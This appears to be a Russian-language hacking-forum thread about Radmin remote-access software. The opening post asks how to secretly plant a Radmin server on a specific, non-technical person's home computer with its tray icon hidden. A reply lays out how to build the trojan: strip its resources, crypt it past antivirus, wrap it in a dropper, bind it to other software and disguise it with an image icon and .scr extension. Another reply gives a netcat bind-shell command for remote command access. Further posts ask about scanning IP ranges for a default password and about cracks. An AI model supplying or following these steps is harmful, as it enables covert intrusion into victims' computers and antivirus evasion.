Здраствуйте античатовцы Есть к вам вопрос по теме... Зачит так..Есть у меня Remote Administrator (RAdmin) 3.2 + NewTrialStop v1.1 Remote Administrator (RAdmin) 3.2 + NewTrialStop v1.1 Депозит Remote Administrator (RAdmin) 3.2 + NewTrialStop v1.1 LetitBit в котором есть собственно 3 файла... 1)файл сервера .exe 2)файл Radmin Viewer .exe 3)ну и файлик заморозки триала.. с файликом newtstop.ini в котором есть [options] hide_tray_icon=1 тоесть возможность скрытия иконки с трея.. мне нужно как то впарить узверю серверную часть.. и конечно же сделать чтоб у негоне было этой иконки.. Я знаю IP адрес узверя..посредством передачи файлов в аське.. Знаю его провайдера.. Знаю что комп узверя находится у него дома..и подключается он с помощю модема..., IP адрес скорее только этого юзверя так как локалки у него нет вообще..и IP статический и не меняется .. Так же знаю что на компе у него стоит нод32 который обновляется... Юзверь не чень продвинут в компах.. Но попасть к нему домой и установит сервер нет возможности..Значит надо хитромудрым способом.. Который вот надеюсь от вас услышать.. А ещё лучше если подскажете как именно это сделать.. Заранее спасибо..
Да..,но маленькая проблемка...,а именно 40$ )) может все таки попробуем сделать что-то..платные софтины я и сам знаю что есть...
Уже отписывался в этом топике... 1. Вычисти все рессурсы с серверной части .. (в т.ч иконки) 2. Делай свой REG файл с настройками (порт;пасс;иконка в трее) 3. Криптуешь серверную часть (платный крипт) ,( по возможности DLL тоже.. т.к они в основном и палятся) 4. В Дельфях\С++ кидаешь в рессурсы серверную часть со всеми DLL + рег файл ... 5. Прописываешь пути инсталов .. в реестр импортируешь настройки, запускаешь сервер 6. Получившуюся загагулину склеииваешь с софтом и впариваешь. (Если юзер нуб то ставишь иконку картинки, + расширение scr или какие там ещё экзекютабельные)
У одного юзера Палится AVASTom... У другого не палится нодом.. но при попытке подключения к ip внешнему и внутреннему.. ничего не получается..
На удаленной машине с динамическим ip стоит Radmin. Получать ip с помощью qip стало невозможным. Задумываюсь о сканере, посоветуйте самый быстрый, заранее благодарен. P.S. Мб есть сканер который диапазоны из текстового файла берет?
Нужно проверить список IPов, на определенный пароль, версия радмина 2, существуют паблик версия? если нет сколько стоит написание?
У меня такой вопрос, когда через режим Telnet связываюсь с удаленной машиной, текст который должен быть русскими буквами, выводится каким-то набором букв. А английский текст как был, так и остается нормальным! Можно че нить сделать для корректного отображения текста?!
Оптимальный вариант на удалённый комп , закачиваем туда утилиту netcat и затем запускаем её опять же через Радмин в режиме Telnet со следующими параметрами Code: nc -l -p 23 -t -e cmd.exe Теперь запускаем у себя cmd.exe и пишем следущие Code: telnet ip вашего радмина xxx.xxx.xx.xx 23 и получаем cmd удалённой системы Code: Microsoft Windows [Версия 5.2.3790] (С) Корпорация Майкрософт, 1985-2003. C:\Documents and Settings\Administrator>cd\ C:\> теперь спокойно можно создавать учётную запись
есть у гонить ключ для radmin server 3? отблагодарю чем смогу или киньте кто ссылку на крякнутую версию(не обязательно 3.3, любую)
HELP Всем доброго времени суток. Значит история такая. Работаю в новой организации недавно. Поставил у себя radmin 3.2, месяц прошел и всё.... у меня сервер 2003. Крэков 50 уже пытался ставить, тщетно. пишет срок активации истек и все. на ХР крэки отлично срабатывают, на месяц продляет и все по-новой, а тут борода. поставил 3.3, а он у меня все твердит,что срок активации истек. весь реестр чистил раз на 20. без толку! раньше тут говорят стояли разные версии Радмина типа 2.1., 2.2, 3.0.... может из-за них такой тупик.... Что можно сделать? ПОМОГИТЕ, ЧЕМ МОЖеТЕ! Очень надо. Всем большое сибирское спасибо! Жду ваших сообщений.